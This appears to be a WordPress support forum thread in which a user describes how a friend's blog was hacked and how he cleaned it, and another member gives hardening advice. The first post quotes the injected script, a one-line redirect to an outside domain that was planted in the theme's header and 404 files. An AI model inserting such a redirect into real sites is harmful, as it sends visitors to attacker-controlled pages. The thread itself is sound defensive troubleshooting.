Forums

WordPress › Support » How-To and Troubleshooting

A friend's site was hacked... (4 posts)

  1. tginsandiego
    Member
    Posted 2 years ago #

    Hey folks,

    My friend (who is awfully sweet, but not very technical) just had her wordpress blog hijacked. I'm technical, but not familiar with WordPress -- I used an http traffic sniffer to find the offending code:

    <script>location="http://mapstracker.cn/?pid=317&sid=84dd6f";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
    <head profile="http://gmpg.org/xfn/11">

    Notice the <script> that gets sent even before the DOCTYPE...

    But I'm in the dark about how wordpress generates the pages, and I'm unfamiliar with webpage script injection.

    Are there any good samaritans out there that could
    1. Help me fix her site
    2. Help her harden her installation so it doesn't happen again?

    Thanks

    Terry

  2. tginsandiego
    Member
    Posted 2 years ago #

    PS -- I was able to determine that she is using WordPress version 2.8.6

  3. tginsandiego
    Member
    Posted 2 years ago #

    Found and fixed the bad code. They had injected the script tags into header.php and 404.php inside the theme.

    Once I had backed up the site to my local hard disk, I was able to use a findfile tool to search the entire site and locate the offending code pretty easily. Searching for <script> quickly located the code, because all of the real/good script tags used by wordpress typically don't close the tag without specifying a text/javascript type.

    So the important lesson I learned was to use a traffic sniffer (like FIDDLER) to quickly see what's going on

    I would still appreciate it if some kind expert could help my friend harden her site.

    Thanks

    Terry

  4. alism
    Member
    Posted 2 years ago #

    Couldn't you have just right clicked, then viewed the page source? I think a traffic sniffer is perhaps overkill for this particular problem, but if it worked for you, great! Did you check the sql database itself too by the way?

    Anyway, why was she hacked? Not keeping her version of WordPress up to date? Rubbish host? Other insecure script? Obvious password?

    There's a good hack clean guide here:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Hardening wise, think about htpasswd protecting her wp-admin folder. If you can limit access to a certain IP, even better.

    Make sure there's a good backup routine in place. You can download plugins to do this automagically, ie:
    http://wordpress.org/extend/plugins/wp-db-backup/

    Change all passwords, admin, database and FTP to something strong.

    Have a read of this too:
    http://codex.wordpress.org/Hardening_WordPress

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags